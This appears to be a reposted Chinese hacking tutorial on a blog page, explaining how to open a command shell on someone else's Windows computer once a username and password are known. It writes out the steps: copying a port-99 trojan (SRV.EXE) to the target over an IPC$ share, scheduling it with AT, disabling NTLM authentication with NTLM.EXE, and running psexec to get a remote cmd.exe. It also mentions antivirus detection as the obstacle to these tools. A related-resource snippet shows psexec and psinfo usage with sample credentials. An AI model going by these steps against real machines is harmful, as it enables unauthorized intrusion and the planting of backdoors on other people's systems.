打开对方CMD的三种方法

为什么建立IPC$提升guest的权限,提的是我自己机子上的guest的权限啊?"

论坛里也看过不少这样的贴了,觉得应该说点什么.如果你真有兴趣学的话,就把

下面几种方法看完吧,如果你觉得一种方法都学不会,就劝你不要再幻想进步了!

利用用户建立了IPC连接,成功的话并不能直接在你的电脑上建立超级用户,

因为NET USER /ADD必须是在本地运行的,

也就是说,你必须想办法TELNET,或者用其他方法跳进对方的CMD里才能建立用

户.如何能利用用户打开对方的CMD呢?

前提:你已经拥有了用户和密码.

方法一

因为前面已经成功建立了IPC连接,所以我

们就可以复制命令把木马传送过去,例如上传SRV.EXE,COPY SRV.EXE //IP/C$

,然后用NET TIME //IP查看对方的时间,再用类似AT //IP SRV.EXE 06:10的命令

来运行SRV.EXE,不要告诉我SRV是开99端口的木马都不知道?!如果顺利SRV没被

杀毒软件KILL了的话,就可以在运行或着CMD里输入TELNET IP 99来登陆对方

CMD了.然后就可以在对方CMD里建立用户了,跟本地DOS操作一样``

方法二

利用NETSVC.EXE这个工具来打开对方的TELNET服务,

但是即使打开了TELNET,也要通过对方NTLM验证,还要把对方NTLM验证关掉,

常用的方法就是,上传流光里的NTLM.EXE,再用AT运行,就可以直接TELNET IP

而不用验证了.再者,也可以在本地建立一个与你用来进行IPC连接的密码和用户名

相同的用户,然后再重新启动用这个用户本地登陆,就可以直接TELNET了

方法三

这方法是最简单最容易而最有效的方法,如果你有耐性看到这里,就说明我的努力

没有白费了.之所以不把这种方法写在前面,是因为想菜鸟们能够多尝试其他的方

法,明白"通往电脑的路不止一条!"的道理.

先在网上下载一套叫PSTOOLS的工具包,PSTOOLS是一套用于winnt/win2000

的系统管理工具,打开压包后里面共有十二个命令,功能非常强大.这里我们要用

到的就是PSEXEC.EXE,具体功能就不说了,自己去看说明吧,使用格式如下

psexec.exe //ip -u 用户名 -p 密码 cmd.exe

这样就能直接打开对方CMD了,而且不用NTLM验证.

下面是PSTOOLS的下载地址,

http://download.pchome.net/system/sysenhance/16488.html

因为SRV.EXE和NTLM.EXE被很多杀毒软件认定为病毒了,多半会被杀掉.所以成功

率不高.对比下第三种方法是最实在的,相信也是看完本文后大家用的最多的方法,希望你能接受吧.也建议大家试试前面的两种方法,如果你有去尝试,你一定会

有收获的.

以上方法都是在网上跟前辈学来的,也算是自己一些小小的经验.但愿看完本文能

让你对打开对方CMD的认识能有所提升.
 
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
readme.txt 用实例详细介绍12个工具的使用方法。 PsTools是一个功能强大的远程管理工具包。工具包可谓是小工具里经典中的经典了,否则MS怎么会收购它呢,现在Telnet大部分关了,AT在win7还有,win10已取消,但PsTools可以使用的。 假设我要对192.168.0.8计算机进行远程管理,那么我可以先打开一个命令行窗口。在命令行中输入以下命令后敲回车:   D:\tools\Pstools>psexec file://192.168.0.8/ -u administrator -p 123 cmd.exe   PsExec v1.31 - execute processes remotely   Copyright (C) 2001-2002 Mark Russinovich   Microsoft Windows 2000 [Version 5.00.2195]   (C) 版权所有 1985-1998 Microsoft Corp.   C:\WINNT\system32>   解释一下,上述参数中的“-u administrator”是表示使用administrator身份来登录192.168.0.8计算机;“-p 123”是表示administrator的密码为123;“cmd.exe”表示我想执行远程计算机上面的cmd.exe命令,如果远程计算机上面没有 这个命令,你可以增加“-c”的参数,这样就可以把本地计算机上的这个命令直接拷贝到远程计算机后再执行。“C:\WINNT \system32>”表示你已经登录到远程计算机上面了。怎么样,这比telnet要方便得多吧,如果对方没有开telent、或者如果对方开了 但仍然使用着NTLM验证,想想看你得花多大的精力才能登录到对方的计算机上面呢?   第二个工具是Psinfo。正如它的名字所示,该命令可以查看本地或者远程计算机的一些系统信息、软件安装信息和其他信息,不加任何参数的Psinfo就只显示本地计算机的系统信息。用法如下:   psinfo [-h] [-s] [-d] [-c] [\\RemoteComputer [-u Username [-p Password]]]   我们用实例来介绍该命令的使用,在命令行下输入:   D:\tools\Pstools>psinfo file://192.168.0.8/ -s -u administrator -p 123   其中“-s”表示显示远程计算机上面已安装的软件信息,“-u”和“-p”含义同PsExec。这条命令显示192.168.0.8计算机上面的系统信息 和软件信息。系统信息包括系统安装时间、内存大小、CPU频率和品牌、操作系统类型等等。………… [未公开参数:自动接受“最终用户许可协议”的参数 -accesseula]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值